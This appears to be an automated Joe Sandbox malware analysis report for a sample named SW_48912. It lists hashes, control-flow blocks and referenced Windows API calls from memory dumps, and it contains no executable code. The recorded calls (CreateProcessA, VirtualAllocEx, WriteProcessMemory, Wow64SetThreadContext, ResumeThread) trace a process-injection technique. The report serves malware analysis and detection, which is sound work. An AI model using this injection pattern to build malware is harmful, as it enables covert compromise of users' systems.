• Opcode ID: e3f02698342f6225b7eb8aebc48a26a14a4b12aab98d2b56229e0dbb4173ac96
• Instruction ID: 1fd7a8cbe872da7fbdaeaf74fb84a4bbd21683c182b08f75a001ab7aeddf0bb6
• Opcode Fuzzy Hash: e3f02698342f6225b7eb8aebc48a26a14a4b12aab98d2b56229e0dbb4173ac96
• Instruction Fuzzy Hash: 3431F2F0B44609DFEB906BD8D805B7E73F1EB04B11F1081BAE902AB2D1D6748941CB91

Control-flow Graph

• Executed
• Not Executed
[Graph for the function at 6f83870: basic blocks 6f83870-6f8395d, with a call to GetCurrentThreadId and a call to 6f82d64; the rendered graph is not reproducible in text]
APIs
• GetCurrentThreadId.KERNEL32 ref: 06F83902
Strings
Memory Dump Source
• Source File: 00000000.00000002.1932510432.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6f80000_SW_48912.jbxd
Similarity
• API ID: CurrentThread
• String ID: s
• API String ID: 2882836952-2660418068
• Opcode ID: 4ef08f9624718bde2330ae80efbe3c9fca08118498b1611069bdfef424dbe0bc
• Instruction ID: 24ecc56e48adfdf1c0153631d344ffe3b5e5dafd43e487ac94b297a0dcfd2df2
• Opcode Fuzzy Hash: 4ef08f9624718bde2330ae80efbe3c9fca08118498b1611069bdfef424dbe0bc
• Instruction Fuzzy Hash: 503136B59042898FCB41EF99C844A9EFFF1FF48310F14859AD459A7326C774A944CFA1

Control-flow Graph

• Executed
• Not Executed
[Graph for the function at 6f83880: basic blocks 6f83880-6f8395d, with a call to GetCurrentThreadId and a call to 6f82d64; the rendered graph is not reproducible in text]
APIs
• GetCurrentThreadId.KERNEL32 ref: 06F83902
Strings
Memory Dump Source
• Source File: 00000000.00000002.1932510432.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6f80000_SW_48912.jbxd
Similarity
• API ID: CurrentThread
• String ID: s
• API String ID: 2882836952-2660418068
• Opcode ID: 4bf255a067fc5a885c09ee0d5b8d0a40183dd3b5ba25e87ed781bdbcdba9ac22
• Instruction ID: 0e00d37e9bd9767b0fbd4557f0f0158f4c40c213a79d0ff7c2021829835983b7
• Opcode Fuzzy Hash: 4bf255a067fc5a885c09ee0d5b8d0a40183dd3b5ba25e87ed781bdbcdba9ac22
• Instruction Fuzzy Hash: 422124B19002498FCB50EF99D884A9EFFF1FF48314F10859AD419AB325C774A945CFA1

                                                                                                                       Control-flow Graph
                                                                                                                       Basic blocks:
                                                                                                                       • 968: 6b84b4c-6b84b6a
                                                                                                                       • 969: 6b84b6c-6b84b6e
                                                                                                                       • 970: 6b84b74-6b84b8b
                                                                                                                       • 971: 6b84b70-6b84b73
                                                                                                                       • 972: 6b84c0e-6b84c15
                                                                                                                       • 973: 6b84c20-6b84c58
                                                                                                                       • 977: 6b84c5f-6b84c61
                                                                                                                       • 978: 6b84b90-6b84b93
                                                                                                                       • 979: 6b84b9c-6b84bb0
                                                                                                                       • 980: 6b84b95
                                                                                                                       • 981: 6b84c66-6b84c81
                                                                                                                       • 983: 6b84cad-6b84cbf
                                                                                                                       • 984: 6b84bb6-6b84bca
                                                                                                                       • 986: 6b84bd0-6b84bde
                                                                                                                       • 988: 6b84be4-6b84bf7
                                                                                                                       • 990: 6b84bfd-6b84c0c
                                                                                                                       • 991: 6b84c99-6b84cac
                                                                                                                       • 992: 6b84c83-6b84c89
                                                                                                                       • 993: 6b84c8b
                                                                                                                       • 994: 6b84c8d-6b84c8f
                                                                                                                       Edges:
                                                                                                                       • 968->969, 968->970, 969->970, 969->971, 970->972, 971->970, 972->973, 973->977, 977->978, 978->979, 978->980
                                                                                                                       • 979->983, 979->984, 980->972, 980->977, 980->979, 980->981, 981->991, 981->992, 984->983, 984->986
                                                                                                                       • 986->983, 986->988, 988->983, 988->990, 990->978, 992->993, 992->994, 993->991, 994->991
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932074508.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6b80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 8hq$8hq
                                                                                                                      • API String ID: 0-601589740
                                                                                                                      • Opcode ID: 4bb52eb435b1736612366a038c9e1a508b0c00e250787c936e65094641319dbd
                                                                                                                      • Instruction ID: 950a5f38281f55606fd881d185d00c814ba5611197c379f670184fd152d116cd
                                                                                                                      • Opcode Fuzzy Hash: 4bb52eb435b1736612366a038c9e1a508b0c00e250787c936e65094641319dbd
                                                                                                                      • Instruction Fuzzy Hash: B931E3B1A04205DFD784EB69D804B697BF6EB85305F2480FAD105CB392E775C809CBA1
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932074508.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6b80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $dq$$dq
                                                                                                                      • API String ID: 0-2340669324
                                                                                                                      • Opcode ID: 7b6fa6ea1a7e2e8d76887bcfbd7911f47c108eaf6bce733afc858521f6e32927
                                                                                                                      • Instruction ID: 73b7d634989856cbebdbc1e788788cd8d905732d03121cbd22ee10cbfc1632ee
                                                                                                                      • Opcode Fuzzy Hash: 7b6fa6ea1a7e2e8d76887bcfbd7911f47c108eaf6bce733afc858521f6e32927
                                                                                                                      • Instruction Fuzzy Hash: 0EC08060B1020D5F7B745DA5FC0031325D1FB4190136061A54C00C3182DA1DC440C251
                                                                                                                      APIs
                                                                                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06F817AE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932510432.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6f80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 963392458-0
                                                                                                                      • Opcode ID: e1a4e495d9885eab37893dbdd010926ee654f03018baef69d46855a2b9d2c1c3
                                                                                                                      • Instruction ID: 8492f3d696de52fb4d5e14c6e3a751558f93dc2a5d503f8abfaf87d746e5fc31
                                                                                                                      • Opcode Fuzzy Hash: e1a4e495d9885eab37893dbdd010926ee654f03018baef69d46855a2b9d2c1c3
                                                                                                                      • Instruction Fuzzy Hash: 4FA16D71D0021ACFDF54DFA8C841BEEBBB2BF49310F1486A9D849A7250DB749986CF91
                                                                                                                      APIs
                                                                                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06F817AE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932510432.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6f80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 963392458-0
                                                                                                                      • Opcode ID: a6effe92cd5cc6b43b35c0dc9e313847629b857cbe4fa3ebeb7fa11ef1c31bcc
                                                                                                                      • Instruction ID: 7a1ad714c093ec1d61c9c33fdb4d6fafa0100c03219436513fba013590419afe
                                                                                                                      • Opcode Fuzzy Hash: a6effe92cd5cc6b43b35c0dc9e313847629b857cbe4fa3ebeb7fa11ef1c31bcc
                                                                                                                      • Instruction Fuzzy Hash: 43915D71D0031A8FDF54DFA8C841BEEBBB2BF49310F1486A9D849A7250DB749986CF91
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932510432.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6f80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ActiveWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2558294473-0
                                                                                                                      • Opcode ID: ee29fa2b4f02082d458734a4c2ce9595fe6094034f79c209fa0f5372b7e107d4
                                                                                                                      • Instruction ID: e2178808819962f6160a7488081ff4c70054b3772d00b551838030ba47fac45d
                                                                                                                      • Opcode Fuzzy Hash: ee29fa2b4f02082d458734a4c2ce9595fe6094034f79c209fa0f5372b7e107d4
                                                                                                                      • Instruction Fuzzy Hash: 2761CE70E103099FDF54EFA5D854BAEBBB2EF88300F148469E805AB394DB74E941CB90
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932074508.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6b80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 4'dq
                                                                                                                      • API String ID: 0-1167855494
                                                                                                                      • Opcode ID: 9eedf003e178564057471b60d45ef302f4f1897bf19a2a5f04fbc898f8bb962d
                                                                                                                      • Instruction ID: 85f1bab71c11c500e3b5911f6ac015da2ae084963d769b82f706bc6d4fcffacd
                                                                                                                      • Opcode Fuzzy Hash: 9eedf003e178564057471b60d45ef302f4f1897bf19a2a5f04fbc898f8bb962d
                                                                                                                      • Instruction Fuzzy Hash: F0E174B4E10219DFDB45EFA8D444BAEBBB2FF88301F108099E505A7364CB359D46EB91
                                                                                                                      APIs
                                                                                                                      • CreateActCtxA.KERNEL32(?), ref: 023959A9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1920811333.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_2390000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Create
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2289755597-0
                                                                                                                      • Opcode ID: 47dcc63def3f3a44858e48ab9901a3b7ca2b7c08c7354e40a27cb7ab35ce6f99
                                                                                                                      • Instruction ID: bb684f002fb11f87e13aeec0e1a5bf0ebf120f95c0956a4c5a20d2502d4650cb
                                                                                                                      • Opcode Fuzzy Hash: 47dcc63def3f3a44858e48ab9901a3b7ca2b7c08c7354e40a27cb7ab35ce6f99
                                                                                                                      • Instruction Fuzzy Hash: 5A41C2B0C00719CBEB25DFA9C8847CEBBB5BF45714F20806AD409AB251DB75698ACF90
                                                                                                                      APIs
                                                                                                                      • CreateActCtxA.KERNEL32(?), ref: 023959A9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1920811333.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_2390000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Create
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2289755597-0
                                                                                                                      • Opcode ID: 19f13c6454a60260e1b55030db2e8135bef1f1bac3e1a6151738559afffb2ea3
                                                                                                                      • Instruction ID: 3ea52a20cc535503ec85c5b677e3367b5fe1b433025b47762edad81d6c269773
                                                                                                                      • Opcode Fuzzy Hash: 19f13c6454a60260e1b55030db2e8135bef1f1bac3e1a6151738559afffb2ea3
                                                                                                                      • Instruction Fuzzy Hash: 0F41D2B0C00719CFEB25DFA9C844B9EBBB5BF49314F60806AD409AB251DB756949CF90
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1930753174.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6670000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFromIconResource
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3668623891-0
                                                                                                                      • Opcode ID: 1534fc677d524b930bb056db888ad460d039c82d5467f4c9d981c61fcdcc271e
                                                                                                                      • Instruction ID: 5720eacbf624c693e5efbc7768a48c7ba4114a6f22e0e6ea629cda91c138858e
                                                                                                                      • Opcode Fuzzy Hash: 1534fc677d524b930bb056db888ad460d039c82d5467f4c9d981c61fcdcc271e
                                                                                                                      • Instruction Fuzzy Hash: 9F318BB29003489FCB11DFA9C844ADEBFF8EF49310F14845AE954A7261C335E954DFA1
                                                                                                                      APIs
                                                                                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06F81380
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932510432.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6f80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MemoryProcessWrite
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3559483778-0
                                                                                                                      • Opcode ID: 7d61ffef45dcc9da7317d082fb08f9fe4973cdc8c59095b9e99fde2b4395a10a
                                                                                                                      • Instruction ID: 5eabdd4bd14cceb13b56c6630c1dccc6c1c1007262cdafa03f0bc5def5d56a92
                                                                                                                      • Opcode Fuzzy Hash: 7d61ffef45dcc9da7317d082fb08f9fe4973cdc8c59095b9e99fde2b4395a10a
                                                                                                                      • Instruction Fuzzy Hash: 4A2169B1D003099FCB10DFA9C885BEEBBF5FF48310F10842AE919A7241C7789A55CBA0
                                                                                                                      APIs
                                                                                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06F81380
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932510432.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6f80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MemoryProcessWrite
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3559483778-0
                                                                                                                      • Opcode ID: bbbeb054127b04ad09ad6d2e9467a7118e2af69611377c45270a52c31a158615
                                                                                                                      • Instruction ID: f539e619dbafa587fc0add3b8514026b4c094b2a926a2b2e9bb2ada2b2644621
                                                                                                                      • Opcode Fuzzy Hash: bbbeb054127b04ad09ad6d2e9467a7118e2af69611377c45270a52c31a158615
                                                                                                                      • Instruction Fuzzy Hash: C22139B1D003499FCB10DFAAC885BDEBBF5FF48310F108429E919A7241C7789955DBA4
                                                                                                                      APIs
                                                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06F81460
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932510432.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6f80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MemoryProcessRead
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1726664587-0
                                                                                                                      • Opcode ID: 16a466c6a152a213c8346daaa2689bd4d2e40f092322261bca2968c21cf59714
                                                                                                                      • Instruction ID: f77a4521065524feec699feaac468d317be27b542f37992a017043af8b168a99
                                                                                                                      • Opcode Fuzzy Hash: 16a466c6a152a213c8346daaa2689bd4d2e40f092322261bca2968c21cf59714
                                                                                                                      • Instruction Fuzzy Hash: 7F2159B1C003499FCB10DFAAC884ADEFBF5FF88320F50842AE559A3251C7749905DBA0
                                                                                                                      APIs
                                                                                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06F80966
                                                                                                                      Memory Dump Source
• Source File: 00000000.00000002.1932510432.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6f80000_SW_48912.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0
• Opcode ID: a291b20b7c05aac8dfff270c2f6e6839239c58e2b8727540fb8c6128eaf927ba
• Instruction ID: 5d79bc7c13d35a827b7bb01d01a5b8d71e4b50e040e1c025e27e42ef34072bca
• Opcode Fuzzy Hash: a291b20b7c05aac8dfff270c2f6e6839239c58e2b8727540fb8c6128eaf927ba
• Instruction Fuzzy Hash: DD2137B1D002099FDB50DFAAC4857EEBBF4EF88324F548429D559A7341CB789945CBA0
APIs
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06F81460
Memory Dump Source
• Source File: 00000000.00000002.1932510432.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6f80000_SW_48912.jbxd
Similarity
• API ID: MemoryProcessRead
• String ID:
• API String ID: 1726664587-0
• Opcode ID: 2a5a362a6baf19b3727bd1a5c93e7ce28031fac53cf10c2788542f120e950bfd
• Instruction ID: 120ced4f8d4f13b64b1343fcca3ca492c4792f8fd57bb77ed27ecb516dab942b
• Opcode Fuzzy Hash: 2a5a362a6baf19b3727bd1a5c93e7ce28031fac53cf10c2788542f120e950bfd
• Instruction Fuzzy Hash: 7C213AB1C003499FDB10DFAAC885ADEFBF5FF48320F508429E559A7250C7349945DBA4
APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06F80966
Memory Dump Source
• Source File: 00000000.00000002.1932510432.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6f80000_SW_48912.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0
• Opcode ID: 546cb633b8faa69e91729e4aebac97370f7e459d6b40a2db3e57b4e9400c0b7d
• Instruction ID: cfb0311a9f199dfdb44354c9812b275afcde232b5182a86311cb0a2c0a393620
• Opcode Fuzzy Hash: 546cb633b8faa69e91729e4aebac97370f7e459d6b40a2db3e57b4e9400c0b7d
• Instruction Fuzzy Hash: E12134B1D003098FDB50DFAAC4857AEBBF4EF88320F54842AD559A7341CB78A944CBA4
APIs
• EnumThreadWindows.USER32(?,00000000,0538D49E,?,?,?,00000E20,?,?,06F83950,03534130,02550A98), ref: 06F839E1
Memory Dump Source
• Source File: 00000000.00000002.1932510432.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6f80000_SW_48912.jbxd
Similarity
• API ID: EnumThreadWindows
• String ID:
• API String ID: 2941952884-0
• Opcode ID: 34562ac5d4cae2b64eb9c260ff778b180ce7671151c47efdf1ad2f93ec36fd2d
• Instruction ID: 57d626ce6321f9f0f5b368848f4afcc7fb859d249a23c65f7bbd880b6be04c51
• Opcode Fuzzy Hash: 34562ac5d4cae2b64eb9c260ff778b180ce7671151c47efdf1ad2f93ec36fd2d
• Instruction Fuzzy Hash: D0213BB1D002198FDB54DF9AC945BEEFBF9EB88320F14842AD459A3250D774A944CFA1
APIs
• EnumThreadWindows.USER32(?,00000000,0538D49E,?,?,?,00000E20,?,?,06F83950,03534130,02550A98), ref: 06F839E1
Memory Dump Source
• Source File: 00000000.00000002.1932510432.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6f80000_SW_48912.jbxd
Similarity
• API ID: EnumThreadWindows
• String ID:
• API String ID: 2941952884-0
• Opcode ID: b24ccad5ade6a5a1b42b4c4b3399ade861390a56d28fb7a9be73def5c178e0fd
• Instruction ID: f237d6d671c7406071a3563e5cf06845a6f08a7cdf005479bdde56b09738ad7e
• Opcode Fuzzy Hash: b24ccad5ade6a5a1b42b4c4b3399ade861390a56d28fb7a9be73def5c178e0fd
• Instruction Fuzzy Hash: 88212971D002098FDB54DF9AC845BEEFBF9EB88320F14846AD459A3350DB74A944CFA5
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0239DE27
Memory Dump Source
• Source File: 00000000.00000002.1920811333.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2390000_SW_48912.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: 5b94016f8a3c5f8087257db522165bd899489e3f290e1796a9e05f63fa38bc29
• Instruction ID: 72de4846d897f6d2000cd86baf3db70c954913191f8ba28807accfcf722fcd07
• Opcode Fuzzy Hash: 5b94016f8a3c5f8087257db522165bd899489e3f290e1796a9e05f63fa38bc29
• Instruction Fuzzy Hash: 8521E2B5D002489FDB10DFAAD984ADEFBF8EB48320F14845AE918A3350C374A944CFA0
APIs
• MessageBoxW.USER32(?,00000000,00000000,?,?,?,?,?,?,?,06F82689,?,?,?), ref: 06F83E35
Memory Dump Source
• Source File: 00000000.00000002.1932510432.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6f80000_SW_48912.jbxd
Similarity
• API ID: Message
• String ID:
• API String ID: 2030045667-0
• Opcode ID: c5891e7d57c13140af5ec78dd0ada2a50c2a7b4f8f202898d9564b2a3a13f3fd
• Instruction ID: c2169d1d379729c7cec2a5ec197a180dd7bfff52bd22548226da7b11bbabeb88
• Opcode Fuzzy Hash: c5891e7d57c13140af5ec78dd0ada2a50c2a7b4f8f202898d9564b2a3a13f3fd
• Instruction Fuzzy Hash: FB2104B6C003499FDB14DF9AC884ADEFBF5FB48710F10846EE819A7210C375A948CBA1
APIs
• MessageBoxW.USER32(?,00000000,00000000,?,?,?,?,?,?,?,06F82689,?,?,?), ref: 06F83E35
Memory Dump Source
• Source File: 00000000.00000002.1932510432.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6f80000_SW_48912.jbxd
Similarity
• API ID: Message
• String ID:
• API String ID: 2030045667-0
• Opcode ID: aaa07adc3da707b1c25496cc7f32a2a9957ea14a745340e8c855433e2d284e44
• Instruction ID: 11d8831199cac50f7415f06279cc7f5baf16e109e023cb6aaefb3d22cd0a6606
• Opcode Fuzzy Hash: aaa07adc3da707b1c25496cc7f32a2a9957ea14a745340e8c855433e2d284e44
• Instruction Fuzzy Hash: 732102B6C013499FCB14DF9AC884ADEBBB5BB48310F14856AE419A7210C374A948CBA0
APIs
• CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,06678AEA,?,?,?,?,?), ref: 06678B8F
Memory Dump Source
• Source File: 00000000.00000002.1930753174.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6670000_SW_48912.jbxd
Similarity
• API ID: CreateFromIconResource
• String ID:
• API String ID: 3668623891-0
• Opcode ID: 99b63c35f3ec907ee8c0431093e354843f765919f78585b4cdfb20a985aadf68
• Instruction ID: ce40811fdfbe821db1351744a3caa3f0f0390fe25d755acc8ee07f555fde67b2
• Opcode Fuzzy Hash: 99b63c35f3ec907ee8c0431093e354843f765919f78585b4cdfb20a985aadf68
• Instruction Fuzzy Hash: 381167B58003499FDB10DF9AC848BDEBFF8EB48320F14841AE914A3210C339A950DFA4
APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06F80E66
Memory Dump Source
• Source File: 00000000.00000002.1932510432.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6f80000_SW_48912.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: fd91be830b009e373e72dafa74dec2bb7d6766d59d60b429ed69f1cc7a514ffb
• Instruction ID: 7b1c3b8cf9a154205483ba5ecc7b491ac61c0d563bf4824c834eadff66aba942
• Opcode Fuzzy Hash: fd91be830b009e373e72dafa74dec2bb7d6766d59d60b429ed69f1cc7a514ffb
• Instruction Fuzzy Hash: 98116AB59002089FCB10DFA9C845BEFBBF9EF48320F148419E519A7250CB359954CFA0
APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06F80E66
Memory Dump Source
• Source File: 00000000.00000002.1932510432.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6f80000_SW_48912.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 5273f460f34dea996deab525574a77a96d9f3b7164cd32e1263e81e65ecf00a3
• Instruction ID: 77eecf4063c6017a1966c2f1dd1615082b5029222cecc87ab5fc8e7d1ddc1f17
• Opcode Fuzzy Hash: 5273f460f34dea996deab525574a77a96d9f3b7164cd32e1263e81e65ecf00a3
• Instruction Fuzzy Hash: 841137719002499FCB10DFAAC845ADFBFF5EF88320F148419E519A7250CB75A944DFA0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1932510432.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6f80000_SW_48912.jbxd
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
• Opcode ID: 57e7f619de5b75f76813a66802f8d8047a0e64bca00aff8462ec3b6d3c00a417
• Instruction ID: 77a1a80060390a2a917e4caaa4e4d7c318f172fa665501065ef6ebdcd42439b3
• Opcode Fuzzy Hash: 57e7f619de5b75f76813a66802f8d8047a0e64bca00aff8462ec3b6d3c00a417
• Instruction Fuzzy Hash: 651116B1D002498FDB14DFAAC8457EFBBF5AB48324F248819D519B7240CB39A544CBA4
APIs
Memory Dump Source
• Source File: 00000000.00000002.1932510432.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6f80000_SW_48912.jbxd
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
• Opcode ID: d61596b392745526ff64e72f35c83f09ce1215f0471c7eee84ecc6b22c9751fd
• Instruction ID: 54734f1015570a398665b6b1fe7195efed2288e3693b36943ab2633556413470
• Opcode Fuzzy Hash: d61596b392745526ff64e72f35c83f09ce1215f0471c7eee84ecc6b22c9751fd
• Instruction Fuzzy Hash: A81125B1D003488FDB14EFAAC84579EFBF9EB88324F248419D519A7240CB75A944CBA4
APIs
• PostMessageW.USER32(?,?,?,?), ref: 06F841BD
Memory Dump Source
• Source File: 00000000.00000002.1932510432.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6f80000_SW_48912.jbxd
Similarity
• API ID: MessagePost
• String ID:
• API String ID: 410705778-0
• Opcode ID: eadd805d501170c0adf8f532848f715a4ead8ad43f2b6f57bc7b4bea4a235542
• Instruction ID: 8bbc27e9940b86860325a366d67ca16777a042608ed504f2e148c6cb8102ee57
• Opcode Fuzzy Hash: eadd805d501170c0adf8f532848f715a4ead8ad43f2b6f57bc7b4bea4a235542
• Instruction Fuzzy Hash: AB1103B5800349DFDB10DF9AD989BDFBBF8EB48320F10844AE518A3650C374A654CFA1
APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 0239BB26
Memory Dump Source
• Source File: 00000000.00000002.1920811333.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2390000_SW_48912.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: 86b3e89e1a19165d980b855f3ba82c280dcf591342a80cd9abaaa2c1ef3cc731
• Instruction ID: efcf42ca4e211062155695be5e93e3705ed05677b4546768907559c52c0711e0
• Opcode Fuzzy Hash: 86b3e89e1a19165d980b855f3ba82c280dcf591342a80cd9abaaa2c1ef3cc731
• Instruction Fuzzy Hash: 56110FB5C003498FCB10DF9AD844A9EFBF5AB89324F10841AD819A7250C375A545CFA1
APIs
• OleInitialize.OLE32(00000000), ref: 06F83495
Memory Dump Source
• Source File: 00000000.00000002.1932510432.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6f80000_SW_48912.jbxd
Similarity
• API ID: Initialize
• String ID:
                                                                                                                      • API String ID: 2538663250-0
                                                                                                                      • Opcode ID: b371a20b2c01a024ce20e6ead6d97c98bab69ad81c79e62153a5fd97f982b6d8
